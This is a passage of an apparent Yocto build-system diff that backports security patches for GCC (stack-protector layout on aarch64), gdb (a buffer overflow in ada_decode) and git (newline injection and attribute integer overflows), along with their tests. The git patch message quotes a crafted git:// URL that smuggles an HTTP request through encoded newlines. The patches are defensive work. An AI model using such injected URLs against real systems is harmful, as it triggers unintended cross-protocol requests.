+the saved registers when stack smash protection is active.
+
+The patch fixes CVE-2023-4039.
+
+gcc/
+	* config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
+	New function.
+	(aarch64_layout_frame): Use it to decide whether locals should
+	go above or below the saved registers.
+	(aarch64_expand_prologue): Update stack layout comment.
+	Emit a stack tie after the final adjustment.
+
+gcc/testsuite/
+	* gcc.target/aarch64/stack-protector-8.c: New test.
+	* gcc.target/aarch64/stack-protector-9.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c                  | 46 +++++++++++++--
+ .../gcc.target/aarch64/stack-protector-8.c    | 58 +++++++++++++++++++
+ .../gcc.target/aarch64/stack-protector-9.c    | 33 +++++++++++
+ 3 files changed, 133 insertions(+), 4 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 705f719a2ea..3d094214fac 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
+   return aarch64_use_frame_pointer;
+ }
+ 
++/* Return true if the current function should save registers above
++   the locals area, rather than below it.  */
++
++static bool
++aarch64_save_regs_above_locals_p ()
++{
++  /* When using stack smash protection, make sure that the canary slot
++     comes between the locals and the saved registers.  Otherwise,
++     it would be possible for a carefully sized smash attack to change
++     the saved registers (particularly LR and FP) without reaching the
++     canary.  */
++  return crtl->stack_protect_guard;
++}
++
+ /* Mark the registers that need to be saved by the callee and calculate
+    the size of the callee-saved registers area and frame record (both FP
+    and LR may be omitted).  */
+@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
+ 
+   cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+ 
++  bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
++
++  if (regs_at_top_p)
++    {
++      cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
++      cfun->machine->frame.bytes_below_hard_fp
++	= aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
++			       STACK_BOUNDARY / BITS_PER_UNIT);
++    }
++
+ #define ALLOCATE_GPR_SLOT(REGNO)					\
+   do									\
+     {									\
+@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
+   HOST_WIDE_INT varargs_and_saved_regs_size
+     = offset + cfun->machine->frame.saved_varargs_size;
+ 
++  cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
++  if (!regs_at_top_p)
++    cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
+   cfun->machine->frame.bytes_above_hard_fp
+-    = aligned_upper_bound (varargs_and_saved_regs_size
+-			   + get_frame_size (),
++    = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
+ 			   STACK_BOUNDARY / BITS_PER_UNIT);
+ 
+   /* Both these values are already aligned.  */
+@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
+ 
+   cfun->machine->frame.bytes_above_locals
+     = cfun->machine->frame.saved_varargs_size;
++  if (regs_at_top_p)
++    cfun->machine->frame.bytes_above_locals
++      += cfun->machine->frame.saved_regs_size;
+ 
+   cfun->machine->frame.initial_adjust = 0;
+   cfun->machine->frame.final_adjust = 0;
+@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ 	|  for register varargs         |
+ 	|                               |
+ 	+-------------------------------+
+-	|  local variables              | <-- frame_pointer_rtx
++	|  local variables (1)          | <-- frame_pointer_rtx
+ 	|                               |
+ 	+-------------------------------+
+-	|  padding                      | \
++	|  padding (1)                  | \
+ 	+-------------------------------+  |
+ 	|  callee-saved registers       |  | frame.saved_regs_size
+ 	+-------------------------------+  |
+@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ 	+-------------------------------+  |
+ 	|  FP'                          | / <- hard_frame_pointer_rtx (aligned)
+         +-------------------------------+
++	|  local variables (2)          |
++	+-------------------------------+
++	|  padding (2)                  |
++	+-------------------------------+
+ 	|  dynamic allocation           |
+ 	+-------------------------------+
+ 	|  padding                      |
+@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ 	+-------------------------------+
+ 	|                               | <-- stack_pointer_rtx (aligned)
+ 
++   The regions marked (1) and (2) are mutually exclusive.  (2) is used
++   when aarch64_save_regs_above_locals_p is true.
++
+    Dynamic stack allocations via alloca() decrease stack_pointer_rtx
+    but leave frame_pointer_rtx and hard_frame_pointer_rtx
+    unchanged.
+@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
+      that is assumed by the called.  */
+   aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
+ 					  !frame_pointer_needed, true);
++  if (emit_frame_chain && maybe_ne (final_adjust, 0))
++    emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
+ }
+ 
+ /* Return TRUE if we can use a simple_return insn.
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+new file mode 100644
+index 00000000000..c5e7deef6c1
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+@@ -0,0 +1,58 @@
++/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void g(void *);
++
++/*
++** test1:
++**	sub	sp, sp, #288
++**	stp	x29, x30, \[sp, #?272\]
++**	add	x29, sp, #?272
++**	mrs	(x[0-9]+), tpidr2_el0
++**	ldr	(x[0-9]+), \[\1, #?16\]
++**	str	\2, \[sp, #?264\]
++**	mov	\2, *0
++**	add	x0, sp, #?8
++**	bl	g
++**	...
++**	mrs	.*
++**	...
++**	bne	.*
++**	...
++**	ldp	x29, x30, \[sp, #?272\]
++**	add	sp, sp, #?288
++**	ret
++**	bl	__stack_chk_fail
++*/
++int test1() {
++  int y[0x40];
++  g(y);
++  return 1;
++}
++
++/*
++** test2:
++**	stp	x29, x30, \[sp, #?-16\]!
++**	mov	x29, sp
++**	sub	sp, sp, #1040
++**	mrs	(x[0-9]+), tpidr2_el0
++**	ldr	(x[0-9]+), \[\1, #?16\]
++**	str	\2, \[sp, #?1032\]
++**	mov	\2, *0
++**	add	x0, sp, #?8
++**	bl	g
++**	...
++**	mrs	.*
++**	...
++**	bne	.*
++**	...
++**	add	sp, sp, #?1040
++**	ldp	x29, x30, \[sp\], #?16
++**	ret
++**	bl	__stack_chk_fail
++*/
++int test2() {
++  int y[0x100];
++  g(y);
++  return 1;
++}
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+new file mode 100644
+index 00000000000..58f322aa480
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+@@ -0,0 +1,33 @@
++/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++/*
++** main:
++**	...
++**	stp	x29, x30, \[sp, #?-[0-9]+\]!
++**	...
++**	sub	sp, sp, #[0-9]+
++**	...
++**	str	x[0-9]+, \[x29, #?-8\]
++**	...
++*/
++int f(const char *);
++void g(void *);
++int main(int argc, char* argv[])
++{
++  int a;
++  int b;
++  char c[2+f(argv[1])];
++  int d[0x100];
++  char y;
++
++  y=42; a=4; b=10;
++  c[0] = 'h'; c[1] = '\0';
++
++  c[f(argv[2])] = '\0';
++
++  __builtin_printf("%d %d\n%s\n", a, b, c);
++  g(d);
++
++  return 0;
++}
+-- 
+2.34.1
+
diff --git a/meta/recipes-devtools/gcc/gcc-common.inc b/meta/recipes-devtools/gcc/gcc-common.inc
index 3dcfdf835f..69a3536965 100644
--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
 SUMMARY = "GNU cc and gcc C compilers"
 HOMEPAGE = "http://www.gnu.org/software/gcc/"
+DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
 SECTION = "devel"
 LICENSE = "GPL"
 
@@ -99,7 +100,7 @@ BINV = "${PV}"
 #S = "${WORKDIR}/gcc-${PV}"
 S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
 
-B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
 
 target_includedir ?= "${includedir}"
 target_libdir ?= "${libdir}"
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-shared-source.inc b/meta/recipes-devtools/gcc/gcc-shared-source.inc
index aac4b49313..4baf7874d2 100644
--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
 
 do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
 do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
+
+# patch is available via gcc-source recipe
+CVE_CHECK_WHITELIST += "CVE-2023-4039"
diff --git a/meta/recipes-devtools/gcc/gcc-source.inc b/meta/recipes-devtools/gcc/gcc-source.inc
index 03bab97815..224b7778ef 100644
--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
 DEPENDS = ""
 PACKAGES = ""
 
+B = "${WORKDIR}/build"
 
 # This needs to be Python to avoid lots of shell variables becoming dependencies.
 python do_preconfigure () {
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
diff --git a/meta/recipes-devtools/gdb/gdb-9.1.inc b/meta/recipes-devtools/gdb/gdb-9.1.inc
index d019e6b384..212c554cf1 100644
--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
            file://0009-resolve-restrict-keyword-conflict.patch \
            file://0010-Fix-invalid-sigprocmask-call.patch \
            file://0011-gdbserver-ctrl-c-handling.patch \
+           file://0012-CVE-2023-39128.patch \
            "
 SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
 SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"
diff --git a/meta/recipes-devtools/gdb/gdb-common.inc b/meta/recipes-devtools/gdb/gdb-common.inc
index 08f615addf..7a4793a73f 100644
--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
 SUMMARY = "GNU debugger"
 HOMEPAGE = "http://www.gnu.org/software/gdb/"
+DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
 SECTION = "devel"
 DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
 
diff --git a/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
new file mode 100644
index 0000000000..6445455bde
--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
+From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
+From: Tom Tromey <tromey@adacore.com>
+Date: Wed, 16 Aug 2023 11:29:19 -0600
+Subject: [PATCH] Avoid buffer overflow in ada_decode
+
+A bug report pointed out a buffer overflow in ada_decode, which Keith
+helpfully analyzed.  ada_decode had a logic error when the input was
+all digits.  While this isn't valid -- and would probably only appear
+in fuzzer tests -- it still should be handled properly.
+
+This patch adds a missing bounds check.  Tested with the self-tests in
+an asan build.
+
+Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
+Reviewed-by: Keith Seitz <keiths@redhat.com>
+
+Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]   
+CVE: CVE-2023-39128
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ gdb/ada-lang.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
+index 0c2d4fc..40852b6 100644
+--- a/gdb/ada-lang.c
++++ b/gdb/ada-lang.c
+@@ -56,6 +56,7 @@
+ #include "cli/cli-utils.h"
+ #include "gdbsupport/function-view.h"
+ #include "gdbsupport/byte-vector.h"
++#include "gdbsupport/selftest.h"
+ #include <algorithm>
+ 
+ /* Define whether or not the C operator '/' truncates towards zero for
+@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
+         i -= 1;
+       if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
+         len0 = i - 1;
+-      else if (encoded[i] == '$')
++      else if (i >= 0 && encoded[i] == '$')
+         len0 = i;
+     }
+ 
+@@ -1350,6 +1351,18 @@ Suppress:
+ 
+ }
+ 
++#ifdef GDB_SELF_TEST
++
++static void
++ada_decode_tests ()
++{
++  /* This isn't valid, but used to cause a crash.  PR gdb/30639.  The
++     result does not really matter very much.  */
++  SELF_CHECK (ada_decode ("44") == "44");
++}
++
++#endif
++
+ /* Table for keeping permanent unique copies of decoded names.  Once
+    allocated, names in this table are never released.  While this is a
+    storage leak, it should not be significant unless there are massive
+@@ -14345,4 +14358,8 @@ DWARF attribute."),
+   gdb::observers::new_objfile.attach (ada_new_objfile_observer);
+   gdb::observers::free_objfile.attach (ada_free_objfile_observer);
+   gdb::observers::inferior_exit.attach (ada_inferior_exit);
++
++#ifdef GDB_SELF_TEST
++  selftests::register_test ("ada-decode", ada_decode_tests);
++#endif
+ }
+-- 
+2.24.4
+
diff --git a/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
new file mode 100644
index 0000000000..725f98f0b7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
+From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 25 Nov 2021 06:36:26 +0000
+Subject: [PATCH] git_connect_git(): forbid newlines in host and path
+
+When we connect to a git:// server, we send an initial request that
+looks something like:
+
+  002dgit-upload-pack repo.git\0host=example.com
+
+If the repo path contains a newline, then it's included literally, and
+we get:
+
+  002egit-upload-pack repo
+  .git\0host=example.com
+
+This works fine if you really do have a newline in your repository name;
+the server side uses the pktline framing to parse the string, not
+newlines. However, there are many _other_ protocols in the wild that do
+parse on newlines, such as HTTP. So a carefully constructed git:// URL
+can actually turn into a valid HTTP request. For example:
+
+  git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
+
+becomes:
+
+  0050git-upload-pack /
+  GET / HTTP/1.1
+  Host:localhost
+
+  host=localhost:1234
+
+on the wire. Again, this isn't a problem for a real Git server, but it
+does mean that feeding a malicious URL to Git (e.g., through a
+submodule) can cause it to make unexpected cross-protocol requests.
+Since repository names with newlines are presumably quite rare (and
+indeed, we already disallow them in git-over-http), let's just disallow
+them over this protocol.
+
+Hostnames could likewise inject a newline, but this is unlikely a
+problem in practice; we'd try resolving the hostname with a newline in
+it, which wouldn't work. Still, it doesn't hurt to err on the side of
+caution there, since we would not expect them to work in the first
+place.
+
+The ssh and local code paths are unaffected by this patch. In both cases
+we're trying to run upload-pack via a shell, and will quote the newline
+so that it makes it intact. An attacker can point an ssh url at an
+arbitrary port, of course, but unless there's an actual ssh server
+there, we'd never get as far as sending our shell command anyway.  We
+_could_ similarly restrict newlines in those protocols out of caution,
+but there seems little benefit to doing so.
+
+The new test here is run alongside the git-daemon tests, which cover the
+same protocol, but it shouldn't actually contact the daemon at all.  In
+theory we could make the test more robust by setting up an actual
+repository with a newline in it (so that our clone would succeed if our
+new check didn't kick in). But a repo directory with newline in it is
+likely not portable across all filesystems. Likewise, we could check
+git-daemon's log that it was not contacted at all, but we do not
+currently record the log (and anyway, it would make the test racy with
+the daemon's log write). We'll just check the client-side stderr to make
+sure we hit the expected code path.
+
+Reported-by: Harold Kim <h.kim@flatt.tech>
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
+CVE: CVE-2021-40330
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ connect.c             | 2 ++
+ t/t5570-git-daemon.sh | 5 +++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/connect.c b/connect.c
+index b6451ab..929de9a 100644
+--- a/connect.c
++++ b/connect.c
+@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
+ 		target_host = xstrdup(hostandport);
+ 
+ 	transport_check_allowed("git");
++	if (strchr(target_host, '\n') || strchr(path, '\n'))
++		die(_("newline is forbidden in git:// hosts and repo paths"));
+ 
+ 	/*
+ 	 * These underlying connection commands die() if they
+diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
+index 34487bb..79cd218 100755
+--- a/t/t5570-git-daemon.sh
++++ b/t/t5570-git-daemon.sh
+@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
+ 	)
+ '
+ 
++test_expect_success 'client refuses to ask for repo with newline' '
++	test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
++	test_i18ngrep newline.is.forbidden stderr
++'
++
+ test_remote_error()
+ {
+ 	do_export=YesPlease
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
+From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:45:15 +0100
+Subject: [PATCH] CVE-2022-23521
+
+attr: fix overflow when upserting attribute with overly long name
+
+The function `git_attr_internal()` is called to upsert attributes into
+the global map. And while all callers pass a `size_t`, the function
+itself accepts an `int` as the attribute name's length. This can lead to
+an integer overflow in case the attribute name is longer than `INT_MAX`.
+
+Now this overflow seems harmless as the first thing we do is to call
+`attr_name_valid()`, and that function only succeeds in case all chars
+in the range of `namelen` match a certain small set of chars. We thus
+can't do an out-of-bounds read as NUL is not part of that set and all
+strings passed to this function are NUL-terminated. And furthermore, we
+wouldn't ever read past the current attribute name anyway due to the
+same reason. And if validation fails we will return early.
+
+On the other hand it feels fragile to rely on this behaviour, even more
+so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
+just do the correct thing here and accept a `size_t` as line length.
+
+Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 &https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579
+
+CVE: CVE-2022-23521
+
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ attr.c                | 97 +++++++++++++++++++++++++++----------------
+ attr.h                | 12 ++++++
+ t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
+ 3 files changed, 132 insertions(+), 36 deletions(-)
+
+diff --git a/attr.c b/attr.c
+index 11f19b5..63484ab 100644
+--- a/attr.c
++++ b/attr.c
+@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
+ #endif
+ 
+ struct git_attr {
+-	int attr_nr; /* unique attribute number */
++	unsigned int attr_nr; /* unique attribute number */
+ 	char name[FLEX_ARRAY]; /* attribute name */
+ };
+ 
+@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
+  * dictionary.  If no entry is found, create a new attribute and store it in
+  * the dictionary.
+  */
+-static const struct git_attr *git_attr_internal(const char *name, int namelen)
++static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
+ {
+ 	struct git_attr *a;
+ 
+@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
+ 		a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
+ 
+ 		attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
+-		assert(a->attr_nr ==
+-		       (hashmap_get_size(&g_attr_hashmap.map) - 1));
++		if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
++			die(_("unable to add additional attribute"));
+ 	}
+ 
+ 	hashmap_unlock(&g_attr_hashmap);
+@@ -283,7 +283,7 @@ struct match_attr {
+ 		const struct git_attr *attr;
+ 	} u;
+ 	char is_macro;
+-	unsigned num_attr;
++	size_t num_attr;
+ 	struct attr_state state[FLEX_ARRAY];
+ };
+ 
+@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ 			      struct attr_state *e)
+ {
+ 	const char *ep, *equals;
+-	int len;
++	size_t len;
+ 
+ 	ep = cp + strcspn(cp, blank);
+ 	equals = strchr(cp, '=');
+@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ 					  int lineno, int macro_ok)
+ {
+-	int namelen;
+-	int num_attr, i;
++	size_t namelen, num_attr, i;
+ 	const char *cp, *name, *states;
+ 	struct match_attr *res = NULL;
+ 	int is_macro;
+@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ 		return NULL;
+ 	name = cp;
+ 
++	if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
++		warning(_("ignoring overly long attributes line %d"), lineno);
++		return NULL;
++	}
++
+ 	if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
+ 		name = pattern.buf;
+ 		namelen = pattern.len;
+@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ 			goto fail_return;
+ 	}
+ 
+-	res = xcalloc(1,
+-		      sizeof(*res) +
+-		      sizeof(struct attr_state) * num_attr +
+-		      (is_macro ? 0 : namelen + 1));
++	res = xcalloc(1, st_add3(sizeof(*res),
++				 st_mult(sizeof(struct attr_state), num_attr),
++				 is_macro ? 0 : namelen + 1));
+ 	if (is_macro) {
+ 		res->u.attr = git_attr_internal(name, namelen);
+ 	} else {
+@@ -458,11 +461,12 @@ struct attr_stack {
+ 
+ static void attr_stack_free(struct attr_stack *e)
+ {
+-	int i;
++	unsigned i;
+ 	free(e->origin);
+ 	for (i = 0; i < e->num_matches; i++) {
+ 		struct match_attr *a = e->attrs[i];
+-		int j;
++		size_t j;
++
+ 		for (j = 0; j < a->num_attr; j++) {
+ 			const char *setto = a->state[j].setto;
+ 			if (setto == ATTR__TRUE ||
+@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
+ 	a = parse_attr_line(line, src, lineno, macro_ok);
+ 	if (!a)
+ 		return;
+-	ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
+-	res->attrs[res->num_matches++] = a;
++	ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
++	res->attrs[res->num_matches - 1] = a;
+ }
+ 
+ static struct attr_stack *read_attr_from_array(const char **list)
+@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
+ 
+ static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
+ {
++	struct strbuf buf = STRBUF_INIT;
+ 	FILE *fp = fopen_or_warn(path, "r");
+ 	struct attr_stack *res;
+-	char buf[2048];
+ 	int lineno = 0;
++	int fd;
++	struct stat st;
+ 
+ 	if (!fp)
+ 		return NULL;
+-	res = xcalloc(1, sizeof(*res));
+-	while (fgets(buf, sizeof(buf), fp)) {
+-		char *bufp = buf;
+-		if (!lineno)
+-			skip_utf8_bom(&bufp, strlen(bufp));
+-		handle_attr_line(res, bufp, path, ++lineno, macro_ok);
++
++	fd = fileno(fp);
++	if (fstat(fd, &st)) {
++		warning_errno(_("cannot fstat gitattributes file '%s'"), path);
++		fclose(fp);
++		return NULL;
+ 	}
++	if (st.st_size >= ATTR_MAX_FILE_SIZE) {
++		warning(_("ignoring overly large gitattributes file '%s'"), path);
++		fclose(fp);
++		return NULL;
++	}
++
++	CALLOC_ARRAY(res, 1);
++	while (strbuf_getline(&buf, fp) != EOF) {
++		if (!lineno && starts_with(buf.buf, utf8_bom))
++			strbuf_remove(&buf, 0, strlen(utf8_bom));
++		handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
++	}
++
+ 	fclose(fp);
++	strbuf_release(&buf);
+ 	return res;
+ }
+ 
+@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
+ 	struct attr_stack *res;
+ 	char *buf, *sp;
+ 	int lineno = 0;
++	size_t size;
+ 
+ 	if (!istate)
+ 		return NULL;
+ 
+-	buf = read_blob_data_from_index(istate, path, NULL);
++	buf = read_blob_data_from_index(istate, path, &size);
+ 	if (!buf)
+ 		return NULL;
++	if (size >= ATTR_MAX_FILE_SIZE) {
